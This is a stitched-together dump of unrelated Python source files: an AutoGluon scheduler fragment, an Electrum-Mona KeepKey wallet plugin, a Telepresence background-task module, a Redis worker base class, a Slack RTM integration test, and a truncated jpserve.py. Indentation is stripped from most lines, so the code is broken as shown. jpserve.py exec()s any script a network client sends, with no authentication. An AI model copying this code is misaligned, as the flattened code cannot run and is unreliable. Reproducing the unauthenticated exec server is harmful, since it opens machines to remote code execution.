os.environ['CUDA_VISIBLE_DEVICES'] = ",".join(map(str, gpu_ids))
os.environ['MXNET_CUDNN_AUTOTUNE_DEFAULT'] = "0"
# running
try:
ret = fn(**args)
except AutoGluonEarlyStop:
ret = None
return_list.append(ret)
try:
            # start the local worker process
p = CustomProcess(target=_worker, args=(return_list, gpu_ids, args))
p.start()
if 'reporter' in args:
cp = Communicator.Create(p, local_reporter, dist_reporter)
p.join()
except Exception as e:
logger.error('Exception in worker process: {}'.format(e))
ret = return_list[0] if len(return_list) > 0 else None
return ret
def _clean_task_internal(self, task_dict):
pass
def _cleaning_tasks(self):
with self.LOCK:
new_scheduled_tasks = []
for task_dict in self.scheduled_tasks:
if task_dict['Job'].done():
self._clean_task_internal(task_dict)
self.finished_tasks.append(self._dict_from_task(task_dict))
else:
new_scheduled_tasks.append(task_dict)
if len(new_scheduled_tasks) < len(self.scheduled_tasks):
self.scheduled_tasks = new_scheduled_tasks
def join_tasks(self):
warn("scheduler.join_tasks() is now deprecated in favor of scheduler.join_jobs().",
AutoGluonWarning)
self.join_jobs()
def join_jobs(self, timeout=None):
"""Wait all scheduled jobs to finish
"""
self._cleaning_tasks()
for task_dict in self.scheduled_tasks:
try:
task_dict['Job'].result(timeout=timeout)
except distributed.TimeoutError as e:
logger.error(str(e))
except:
logger.error("Unexpected error:", sys.exc_info()[0])
raise
self._clean_task_internal(task_dict)
self._cleaning_tasks()
def shutdown(self):
"""shutdown() is now deprecated in favor of :func:`autogluon.done`.
"""
warn("scheduler.shutdown() is now deprecated in favor of autogluon.done().",
AutoGluonWarning)
self.join_jobs()
self.remote_manager.shutdown()
def state_dict(self, destination=None):
"""Returns a dictionary containing a whole state of the Scheduler
Examples
--------
>>> ag.save(scheduler.state_dict(), 'checkpoint.ag')
"""
if destination is None:
destination = OrderedDict()
destination._metadata = OrderedDict()
destination['finished_tasks'] = pickle.dumps(self.finished_tasks)
destination['TASK_ID'] = Task.TASK_ID.value
return destination
def load_state_dict(self, state_dict):
"""Load from the saved state dict.
Examples
--------
>>> scheduler.load_state_dict(ag.load('checkpoint.ag'))
"""
self.finished_tasks = pickle.loads(state_dict['finished_tasks'])
Task.set_id(state_dict['TASK_ID'])
logger.debug('\nLoading finished_tasks: {} '.format(self.finished_tasks))
@property
def num_finished_tasks(self):
return len(self.finished_tasks)
def __repr__(self):
reprstr = self.__class__.__name__ + '(\n' + \
str(self.resource_manager) +')\n'
return reprstr
|
keepkey.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum_mona.util import bfh, bh2u, UserCancelled, UserFacingException
from electrum_mona.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum_mona.bip32 import BIP32Node
from electrum_mona import constants
from electrum_mona.i18n import _
from electrum_mona.transaction import deserialize, Transaction
from electrum_mona.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_mona.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
import keepkeylib.transport_webusb
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = (keepkeylib.transport_hid.DEVICE_IDS +
keepkeylib.transport_webusb.DEVICE_IDS)
self.device_manager().register_devices(self.DEVICE_IDS)
self.libraries_available = True
except ImportError:
self.libraries_available = False
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
def webusb_transport(self, device):
from keepkeylib.transport_webusb import WebUsbTransport
for d in WebUsbTransport.enumerate():
if device.id_.startswith(d.getSerialNumber()):
return WebUsbTransport(d)
return WebUsbTransport(device)
def _try_hid(self, device):
self.logger.info("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.logger.info(f"cannot connect at {device.path} {e}")
return None
def _try_webusb(self, device):
self.logger.info("Trying to connect over WebUSB...")
try:
return self.webusb_transport(device)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
def create_client(self, device, handler):
if device.product_key[1] == 2:
transport = self._try_webusb(device)
else:
transport = self._try_hid(device)
if not transport:
self.logger.info("cannot connect to device")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Monacoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.get_keepkey_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.get_keepkey_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx: Transaction):
def create_output_by_derivation():
script_type = self.get_keepkey_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if info.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
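# A minimal sketch of how sign_message() and show_address() above build the
# BIP32 path handed to the device: the keystore derivation is suffixed with
# "/<change>/<index>" before client.expand_path() turns it into address_n.
# The derivation string used here is a hypothetical example.
def _example_address_path(derivation="m/44'/22'/0'", change=0, index=5):
    return derivation + "/%d/%d" % (change, index)   # -> "m/44'/22'/0'/0/5"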
|
background.py
|
# Copyright 2018 Datawire. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from abc import ABC, abstractmethod
from http.server import HTTPServer, BaseHTTPRequestHandler
from subprocess import Popen, TimeoutExpired
from threading import Thread
from typing import Optional, Callable, List
from telepresence.utilities import kill_process
class Background(ABC):
"""
A process or thread running separately from the main thread
"""
def __init__(self, name: str, killer: Optional[Callable],
critical: bool) -> None:
"""
:param name: Always useful for identification in messages
:param killer: Optional callable to kill this background thing
:param critical: Is the death of this item fatal to the session?
"""
self.name = name
self.killer = killer
self.critical = critical
@property
@abstractmethod
def alive(self) -> bool:
pass
@abstractmethod
def join(self, timeout: Optional[float]) -> None:
pass
@abstractmethod
def kill(self) -> None:
pass
def __str__(self) -> str:
return "{} {}".format(self.__class__.__name__, self.name)
class BackgroundThread(Background):
def __init__(
self, name, thread: Thread, killer=None, critical=True
) -> None:
super().__init__(name, killer, critical)
self.thread = thread
@property
def alive(self) -> bool:
return self.thread.is_alive()
def join(self, timeout: Optional[float] = None) -> None:
self.thread.join(timeout)
if self.thread.is_alive():
raise TimeoutExpired(["Thread", self.name], timeout)
def kill(self) -> None:
assert self.killer is not None
if self.thread.is_alive():
self.killer()
self.thread.join()
class BackgroundProcess(Background):
def __init__(
self, name: str, process: Popen, killer=None, critical=True
) -> None:
super().__init__(name, killer, critical)
self.process = process
@property
def alive(self) -> bool:
return self.process.poll() is None
def join(self, timeout: Optional[float] = None) -> None:
self.process.wait(timeout)
def kill(self) -> None:
if self.killer is None:
self.killer = lambda: kill_process(self.process)
self.killer()
self.process.wait()
class TrackedBG(object):
"""
Tracked background processes, threads, etc.
"""
def __init__(self, runner):
List # Avoid Pyflakes F401
self.runner = runner
self.subprocesses = [] # type: List[Background]
runner.add_cleanup("Kill background items", self.killall)
def append(self, bg: Background) -> None:
"""
Register a background item to be tracked and eventually shut down
"""
self.subprocesses.append(bg)
# Grep-able log: self.runner.write("Tracking {}".format(bg))
def killall(self):
"""
Kill all tracked items
"""
for bg in reversed(self.subprocesses):
self.runner.write("Killing {}".format(bg))
bg.kill()
def which_dead(self) -> List[Background]:
"""
Return which (if any) background items are dead.
FIXME: Does not consider critical flag.
"""
dead_processes = [] # type: List[Background]
dead_others = []
for bg in self.subprocesses:
if not bg.alive:
if isinstance(bg, BackgroundProcess):
dead_processes.append(bg)
exit_info = " (exit code {})".format(bg.process.poll())
else:
dead_others.append(bg)
exit_info = " (why?)"
self.runner.write("{} is dead{}".format(bg, exit_info))
assert not dead_others, dead_others
return dead_processes + dead_others
class DumbHandler(BaseHTTPRequestHandler):
"""
HTTP handler that returns success for any HEAD request
"""
tel_output = print
def do_HEAD(self) -> None:
"Handle head"
self.send_response(200)
self.end_headers()
def log_message(self, format: str, *args) -> None:
"""
Make sure log messages go to the right place
"""
message = format % args
if message == '"HEAD / HTTP/1.1" 200 -':
message = "(proxy checking local liveness)"
self.tel_output(message)
def launch_local_server(port: int, output) -> Background:
"""
Make a dumb web server for the proxy pod to poll.
"""
DumbHandler.tel_output = output.write
server = HTTPServer(("127.0.0.1", port), DumbHandler)
thread = Thread(target=server.serve_forever, daemon=True)
thread.start()
name = "Web server for proxy poll"
output.write("Launching " + name)
return BackgroundThread(name, thread, killer=server.shutdown)
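# Illustrative usage sketch (not part of the original module): wrap a child
# process in BackgroundProcess and wait for it. The command is a placeholder.
def _example_background_usage() -> None:
    proc = Popen(["sleep", "1"])
    bg = BackgroundProcess("example sleeper", proc)
    assert bg.alive
    bg.join(timeout=5)  # BackgroundProcess.join delegates to Popen.wait
    assert not bg.alive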
|
worker.py
|
import time
import datetime
import json
import redis
import threading
import sys
import constants
from logger.Logger import Logger, LOG_LEVEL
class Worker:
"""Base Worker Class
A worker is responsible for handling its set of operations and
running on a thread
"""
def __init__(self, config, main_thread_running, system_ready):
self.config = config
# Threading Events to Keep Everything in Sync
self.main_thread_running = main_thread_running
self.system_ready = system_ready
self.worker_available = threading.Event()
        self.components = []
        # work() sleeps for self.sleep_duration on each loop; give it a default
        # here (an assumed value) since subclasses normally set their own.
        self.sleep_duration = 0.5
        return
def init(self):
# print('Worker...\t\t\t\033[1;32m Initializing\033[0;0m'.format(**control))
return
def run(self):
t = threading.Thread(target=self.work, args=())
t.start()
return t
def work(self):
while self.main_thread_running.is_set():
if self.system_ready.is_set():
time.sleep(self.sleep_duration)
        # This is only run after the main thread is shut down
Logger.log(LOG_LEVEL["info"],
"Worker Shutting Down...\t\033[1;32m Complete\033[0;0m")
def elapsed_time(self):
self.time_elapsed = time.perf_counter() - self.time_start
return self.time_elapsed
def reset_elapsed_time(self):
self.time_start = time.perf_counter()
pass
def dynamic_import(self, name):
# Split path of the class folder structure:
# {sensor name}_sensor . {SensorName}Sensor
components = name.split('.')
# Dynamically import root of component path
module = __import__(components[0])
# Get component attributes
for component in components[1:]:
module = getattr(module, component)
return module
    def decode_message_data(self, message):
        # Messages arrive as a dict, a JSON-encoded (byte) string, or raw bytes
        if isinstance(message, dict):
            return message
        elif isinstance(message, (bytes, str)):
            try:
                payload = message.decode('utf-8') if isinstance(message, bytes) else message
                return json.loads(payload)
            except (UnicodeDecodeError, ValueError):
                # Not UTF-8 JSON; wrap the raw payload so callers always get a dict
                return {'event': 'Unknown', 'data': message}
        else:
            # Unrecognized type
            return {'event': 'Unknown', 'data': message}
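# Illustrative sketch (not part of the original module): a minimal subclass of
# the Worker base class above. The one-second interval and the body of work()
# are assumptions made up for the example.
class ExampleWorker(Worker):
    def __init__(self, config, main_thread_running, system_ready):
        super().__init__(config, main_thread_running, system_ready)
        self.sleep_duration = 1  # seconds between loop iterations
    def work(self):
        while self.main_thread_running.is_set():
            if self.system_ready.is_set():
                # A real worker would poll its components / Redis here
                pass
            time.sleep(self.sleep_duration)
        Logger.log(LOG_LEVEL["info"], "ExampleWorker Shutting Down")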
|
test_issue_605.py
|
import collections
import logging
import os
import threading
import time
import unittest
import pytest
from integration_tests.env_variable_names import \
SLACK_SDK_TEST_CLASSIC_APP_BOT_TOKEN, \
SLACK_SDK_TEST_RTM_TEST_CHANNEL_ID
from integration_tests.helpers import is_not_specified
from slack import RTMClient, WebClient
class TestRTMClient(unittest.TestCase):
"""Runs integration tests with real Slack API
https://github.com/slackapi/python-slackclient/issues/605
"""
def setUp(self):
self.logger = logging.getLogger(__name__)
self.bot_token = os.environ[SLACK_SDK_TEST_CLASSIC_APP_BOT_TOKEN]
self.channel_id = os.environ[SLACK_SDK_TEST_RTM_TEST_CHANNEL_ID]
self.rtm_client = RTMClient(token=self.bot_token, run_async=False)
def tearDown(self):
        # Reset the callbacks registered by @RTMClient.run_on
RTMClient._callbacks = collections.defaultdict(list)
@pytest.mark.skipif(condition=is_not_specified(), reason="To avoid rate_limited errors")
def test_issue_605(self):
self.text = "This message was sent to verify issue #605"
self.called = False
@RTMClient.run_on(event="message")
def process_messages(**payload):
self.logger.info(payload)
self.called = True
def connect():
self.logger.debug("Starting RTM Client...")
self.rtm_client.start()
t = threading.Thread(target=connect)
        t.daemon = True
try:
t.start()
self.assertFalse(self.called)
time.sleep(3)
self.web_client = WebClient(
token=self.bot_token,
run_async=False,
)
new_message = self.web_client.chat_postMessage(channel=self.channel_id, text=self.text)
self.assertFalse("error" in new_message)
time.sleep(5)
self.assertTrue(self.called)
finally:
t.join(.3)
# --- a/slack/rtm/client.py
# +++ b/slack/rtm/client.py
# @@ -10,7 +10,6 @@ import inspect
# import signal
# from typing import Optional, Callable, DefaultDict
# from ssl import SSLContext
# -from threading import current_thread, main_thread
#
# # ThirdParty Imports
# import asyncio
# @@ -186,7 +185,8 @@ class RTMClient(object):
# SlackApiError: Unable to retrieve RTM URL from Slack.
# """
# # TODO: Add Windows support for graceful shutdowns.
# - if os.name != "nt" and current_thread() == main_thread():
# + # if os.name != "nt" and current_thread() == main_thread():
# + if os.name != "nt":
# signals = (signal.SIGHUP, signal.SIGTERM, signal.SIGINT)
# for s in signals:
# self._event_loop.add_signal_handler(s, self.stop)
# Exception in thread Thread-1:
# Traceback (most recent call last):
# File "/path-to-python/asyncio/unix_events.py", line 95, in add_signal_handler
# signal.set_wakeup_fd(self._csock.fileno())
# ValueError: set_wakeup_fd only works in main thread
#
# During handling of the above exception, another exception occurred:
#
# Traceback (most recent call last):
# File "/path-to-python/threading.py", line 932, in _bootstrap_inner
# self.run()
# File "/path-to-python/threading.py", line 870, in run
# self._target(*self._args, **self._kwargs)
# File "/path-to-project/python-slackclient/integration_tests/rtm/test_issue_605.py", line 29, in connect
# self.rtm_client.start()
# File "/path-to-project/python-slackclient/slack/rtm/client.py", line 192, in start
# self._event_loop.add_signal_handler(s, self.stop)
# File "/path-to-python/asyncio/unix_events.py", line 97, in add_signal_handler
# raise RuntimeError(str(exc))
# RuntimeError: set_wakeup_fd only works in main thread
|
jpserve.py
|
r"""JPServer is a Python script executor running on the Python side.
JPServe receiving and executing the script from 3rd-part languages,
then send back the result as JSON format to the caller.
Usages:
- Start server
server = JPServe(("hostname", port))
server.start()
- Stop server
server.shutdown()
- Set log level
server.setLogLevel(logging.DEBUG)
- The sample to make call from java side
import net.xdevelop.jpserve.PyClient
import net.xdevelop.jpserve.PyResult
String script = "a = 2\r\n" +
"b = 3\r\n" +
"_result_ = a * b\r\n";
PyClient client = PyClient.getInstance("localhost", "8888");
PyResult rs = client.exec(script);
// output the _result_ value calculated by Python
if (rs.getSuccess()) {
System.out.println(rs.getResult());
}
else {
System.out.println(rs.getMsg());
}
"""
from socketserver import StreamRequestHandler, ThreadingTCPServer, ForkingTCPServer
import logging
import os
import threading
import json
__all__ = ["JPServe"]
logger = logging.getLogger('JPServe')
class JPServe():
def __init__(self, server_address):
self.server_address = server_address
logging.basicConfig(level=logging.INFO)
logger.setLevel(logging.INFO)
def start(self):
logger.info("JPServe starting...")
if os.name == 'nt':
self.serv = PThreadingTCPServer(self.server_address, ServeHandler)
else:
self.serv = PForkingTCPServer(self.server_address, ServeHandler)
self.t = threading.Thread(target=self.serv.serve_forever)
self.t.start()
logger.info("JPServe listening in %s %s " % self.server_address)
def shutdown(self):
try:
self.serv.shutdown()
self.serv.server_close()
except Exception as e:
            logger.error(str(e))
logger.info("JPServe stopped.")
def setLogLevel(self, level):
logger.setLevel(level)
# Constant values for ServerHandler
BEGIN_MARK = b"#!{"
END_MARK = b"#!}"
CMD_EXIT = b"#!exit"
class ServeHandler(StreamRequestHandler):
r""" The handler to receive and exec the python script from 3rd-part side.
Client request syntax:
line0: #!{
line1-n: python script
linen+1: _result_ = the value return to caller
linen+2: #!}
    Response to client:
        line0: #!{
        line1-n: the JSON result, e.g.
            {
                "result": _result_ value,
                "success": true or false,
                "msg": "success" or "error message"
            }
        last line: #!}
Example:
Request:
#!{
a = 2 * 3
_result_= a
#!}
Response:
#!{
{
"result": 6,
"success": true,
"msg": "success"
}
#!}
"""
def handle(self):
self.request.setblocking(False)
while True:
if self.server.stopped:
break
try:
# read begin mark #!{
begin_mark = self.rfile.readline().strip()
if (begin_mark == CMD_EXIT): # end request
logger.info("Client (%s:%d) exit." % (self.client_address[0], self.client_address[1]))
break
if begin_mark != BEGIN_MARK:
continue
# read python script
script = ""
lines = []
while not self.server.stopped:
data = self.rfile.readline()
if data.strip() == END_MARK: # check end mark
break
elif len(data) > 0:
lines.append(data.decode("utf-8"))
script = "".join(lines)
logger.info("Received script from (%s:%d): \n%s" % (self.client_address[0], self.client_address[1], script))
except Exception as e:
logger.error("Read request failed: %s" % str(e))
break
if self.server.stopped:
break
# exec script
local_vars = {}
try:
local_vars["_result_"] = None
exec(compile(script, "<string>", "exec"), globals(), local_vars)
local_vars["_success_"] = True
local_vars["_msg_"] = "success"
except Exception as e:
logger.error("Exec script failed: %s" % str(e))
local_vars["_success_"] = False
local_vars["_msg_"] = "Execute script failed: %s" % str(e)
# response the result as JSON
try:
response = self.toJSON(local_vars)
logger.info("return: %s" % response.decode("utf-8"))
self.wfile.write("#!{\r\n".encode("utf-8"))
self.wfile.write(response)
self.wfile.write("\r\n#!}\r\n".encode("utf-8"))
except Exception as e:
logger.error("Sent result to client failed: %s" % str(e))
break
def toJSON(self, local_vars):
rs = {"success": local_vars["_success_"], "msg": local_vars["_msg_"], "result": json.dumps(local_vars["_result_"]) }
response = json.dumps(rs, indent=4)
response = bytes(response, "utf-8")
return response
class PThreadingTCPServer(ThreadingTCPServer):
